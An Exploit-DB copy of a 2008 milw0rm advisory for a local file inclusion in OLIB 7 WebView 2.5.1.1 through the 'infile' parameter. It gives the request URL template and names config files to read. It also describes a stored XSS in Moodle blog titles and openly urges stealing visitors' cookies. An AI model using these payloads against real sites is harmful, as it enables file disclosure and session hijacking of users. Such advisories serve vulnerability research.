OLIB 7 WebView 2.5.1.1 - 'infile' Local File Inclusion

EDB-ID:

6653


Author:

ZeN

Type:

webapps


Platform:

PHP

Date:

2008-10-02


Become a Certified Penetration Tester

Enroll in Penetration Testing with Kali Linux and pass the exam to become an Offensive Security Certified Professional (OSCP). All new content for 2020.

Security Advisory for 'OLIB 7 Webview'

This software is apart of Moodle.

Software - OLIB 7 WebView v2.5.1.1
Exploit  - LFI
Severity - High
Author	 - ZeN
website  - http://dusecurity.com/
Date	 - 2nd October 2008

DUSecurity Team / DarkCode


Exploit >

http://olib.site.com/cgi/?session=[session_key]&infile=[LFI]

files in dir - get_settings.ini, setup.ini(contains config file locations), text.ini


Info - You need to login to get a valid session key.


------------------
Extraz :

Moodle Permanent XSS

In Moodle blogging system, simply make a new blog entry with the title

<script>alert()</script>

Now everyone that visits the bloggins system with execute your XSS.
Go get some cookies =D

Enjoy!

------------------


Shouts :-
DUSecurity.com
DarkCode.me
Milw0rm.com
iWannaHack
WL-Group

# milw0rm.com [2008-10-02]